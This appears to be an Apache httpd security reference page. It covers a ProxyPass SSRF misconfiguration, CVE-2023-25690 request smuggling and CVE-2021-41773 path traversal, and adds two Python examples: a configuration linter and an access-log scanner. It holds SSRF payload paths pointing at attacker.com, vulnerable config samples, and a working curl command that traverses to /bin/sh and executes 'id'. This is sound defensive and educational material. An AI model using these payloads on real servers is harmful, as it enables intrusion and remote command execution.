Apache

Apache HTTP Server (httpd) is a widely used open-source web server. It provides HTTP server functionality and supports loadable modules. It is maintained by the Apache Software Foundation.

Misconfiguration

SSRF - ProxyPass & No ending slash

A ProxyPass directive whose target URL has no trailing slash (here, no path at all) allows an SSRF attack: mod_proxy appends the remainder of the request path directly to the target, so a crafted path can change the host the backend request is sent to.

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so

<VirtualHost *:80>
  ServerName victim.com
  ProxyPass / http://example.com
</VirtualHost>

Request paths that turn the proxied target into a different host (http://example.com@attacker.com/ and http://example.com.attacker.com/ respectively):

  • http://victim.com/@attacker.com/
  • http://victim.com/.attacker.com/

Vulnerabilities

CVE-2023-25690 - Request Smuggling

  • Version: 2.4.0 through 2.4.55
  • Affected when mod_proxy is enabled together with a RewriteRule or ProxyPassMatch that re-inserts part of the user-supplied request URL into the proxied request target, for example:

RewriteEngine On
# [P] proxies the rewritten URL through mod_proxy; $1 re-inserts client-controlled path data
RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]
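Added example, not code from the original page or from the Apache project: a small Python linter that scans an httpd configuration for the two mod_proxy patterns above, a ProxyPass whose target has no path (so appended request text lands in the URL authority) and a RewriteRule carrying the [P] flag whose target re-inserts a capture from the client request. The configuration text, the hostnames backend.internal and cdn.internal, and the modelling of how mod_proxy joins the ProxyPass target with the remaining request path are all constructed assumptions of this example.

```python
"""Added example, not code from the original page or the Apache project:
lint an httpd configuration for the two mod_proxy patterns discussed above.

  1. ProxyPass whose target URL has no path component ("http://example.com"):
     mod_proxy appends the remainder of the request path to the target, so
     text such as "@attacker.com/" merges into the URL authority (SSRF).
  2. RewriteRule with the [P] (proxy) flag whose target re-inserts a capture
     ($1, %1, ...) or request variable from the client request (the
     CVE-2023-25690 pattern on httpd 2.4.0 through 2.4.55).

SAMPLE_CONFIG is constructed for this example; backend.internal and
cdn.internal are placeholder hostnames.
"""
import re
from typing import Optional
from urllib.parse import urlsplit

SAMPLE_CONFIG = """\
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so

<VirtualHost *:80>
  ServerName victim.com
  ProxyPass / http://example.com
  ProxyPass /api/ http://backend.internal:8080/
  RewriteEngine On
  RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1" [P]
  RewriteRule "^/static/(.*)" "http://cdn.internal/$1" [R=302,L]
</VirtualHost>
"""

# ProxyPass <mount> <target>; ProxyPassMatch/ProxyPassReverse do not match
# because whitespace must follow the directive name.
PROXYPASS_RE = re.compile(r'^\s*ProxyPass\s+(\S+)\s+(\S+)', re.IGNORECASE)
# RewriteRule <pattern> <substitution> [flags], arguments optionally quoted.
REWRITE_RE = re.compile(
    r'^\s*RewriteRule\s+("[^"]*"|\S+)\s+("[^"]*"|\S+)(?:\s+\[([^\]]*)\])?',
    re.IGNORECASE)
# Heuristic: substitutions that carry request-derived data into the target.
BACKREF_RE = re.compile(
    r'\$[1-9]|%[1-9]|%\{(?:REQUEST_URI|QUERY_STRING|PATH_INFO|THE_REQUEST)\}')


def find_proxypass_without_path(config: str):
    """Return (line_no, mount, target) for ProxyPass targets that have no path."""
    findings = []
    for n, line in enumerate(config.splitlines(), 1):
        m = PROXYPASS_RE.match(line)
        if not m:
            continue
        mount, target = m.group(1), m.group(2)
        if target == "!":          # "ProxyPass /x !" excludes a path, not a URL
            continue
        if urlsplit(target).path == "":
            findings.append((n, mount, target))
    return findings


def find_proxy_rewrites_with_backrefs(config: str):
    """Return (line_no, substitution) for [P] rules that re-insert request data."""
    findings = []
    for n, line in enumerate(config.splitlines(), 1):
        m = REWRITE_RE.match(line)
        if not m:
            continue
        target = m.group(2).strip('"')
        flags = {f.split("=", 1)[0].strip().lower()
                 for f in (m.group(3) or "").split(",") if f.strip()}
        if flags & {"p", "proxy"} and BACKREF_RE.search(target):
            findings.append((n, target))
    return findings


def effective_upstream(mount: str, target: str, request_path: str) -> str:
    """Model (an assumption of this example) of how mod_proxy builds the
    upstream URL: the mount prefix is stripped and the rest is appended."""
    if not request_path.startswith(mount):
        raise ValueError("request path does not match mount")
    return target + request_path[len(mount):]


def upstream_host(mount: str, target: str, request_path: str) -> Optional[str]:
    """Host the proxied request would actually be sent to."""
    return urlsplit(effective_upstream(mount, target, request_path)).hostname


if __name__ == "__main__":
    for n, mount, target in find_proxypass_without_path(SAMPLE_CONFIG):
        print(f"line {n}: ProxyPass {mount} {target} has no path; "
              f"/@attacker.com/ would reach host "
              f"{upstream_host(mount, target, '/@attacker.com/')}")
    for n, target in find_proxy_rewrites_with_backrefs(SAMPLE_CONFIG):
        print(f"line {n}: proxied RewriteRule re-inserts request data: {target}")
```

The ProxyPass check keys on an empty URL path rather than merely a missing trailing slash, because that is the case where appended request text ends up in the authority part of the URL; a target such as http://backend.internal:8080/ keeps everything appended inside its path.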

CVE-2021-41773 - Path Traversal & Potential RCE

  • Version: 2.4.49
  • Requests can reach files outside the document root unless those paths are protected by "Require all denied"; with mod_cgi enabled (the /cgi-bin/ alias), the traversal reaches /bin/sh and the POST body is executed, as in the example below.
$ curl 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' \
    -d 'echo Content-Type: text/plain; echo; id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
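Added example, not code from the original page or from the Apache project: a Python scanner that reads Apache access-log lines in the combined format and flags request targets containing a path segment that percent-decodes to "..", the encoded form the 2.4.49 normaliser failed to collapse. It decodes each segment repeatedly (bounded), so it also catches variants such as %2e%2e and double-encoded forms, which goes beyond the single encoding shown above. The log lines, client addresses, timestamps and user agents are constructed placeholders.

```python
"""Added example, not code from the original page or the Apache project:
scan Apache access-log lines (combined LogFormat) for the encoded path
traversal used against httpd 2.4.49 above. A segment such as ".%2e" decodes
to "..", which 2.4.49's path normaliser did not collapse. Each segment is
percent-decoded up to max_rounds times, so "%2e%2e" and double-encoded
forms are reported too. SAMPLE_LOG is constructed for this example.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [05/Oct/2021:10:15:32 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 52 "-" "curl/7.68.0"
10.0.0.5 - - [05/Oct/2021:10:15:40 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 500 0 "-" "curl/7.68.0"
192.168.1.20 - - [05/Oct/2021:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
192.168.1.21 - - [05/Oct/2021:10:16:05 +0000] "GET /docs/../index.html HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
"""

# combined format: host ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')


def traversal_segments(raw_target: str, max_rounds: int = 3):
    """Return [(raw_segment, was_encoded)] for every path segment that
    becomes '..' within max_rounds of percent-decoding."""
    hits = []
    path = raw_target.split("?", 1)[0]          # ignore the query string
    for seg in path.split("/"):
        decoded = seg
        for _ in range(max_rounds):
            nxt = unquote(decoded)
            if nxt == decoded:                  # nothing left to decode
                break
            decoded = nxt
        if decoded == "..":
            hits.append((seg, seg != ".."))
    return hits


def scan_access_log(log_text: str):
    """Return one finding per request whose path contains a traversal segment.

    Encoded dot segments get severity "high" because they are the ones that
    slipped past normalisation; a literal ".." is normalised by httpd before
    any filesystem access, so it is reported as "medium" for awareness only.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                            # malformed line; skipped here
        hits = traversal_segments(m["target"])
        if not hits:
            continue
        encoded = any(enc for _, enc in hits)
        findings.append({
            "client": m["client"],
            "method": m["method"],
            "target": m["target"],
            "status": int(m["status"]),
            "encoded": encoded,
            "cgi_bin": m["target"].startswith("/cgi-bin/"),
            "severity": "high" if encoded else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:14} {f['method']} {f['target']} -> {f['status']}")
```

A high-severity hit under /cgi-bin/ with a 2xx status is the combination that corresponds to the successful request shown above; the same request against a host that protects the filesystem with "Require all denied" shows up with a 403 and is still worth alerting on.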

Resources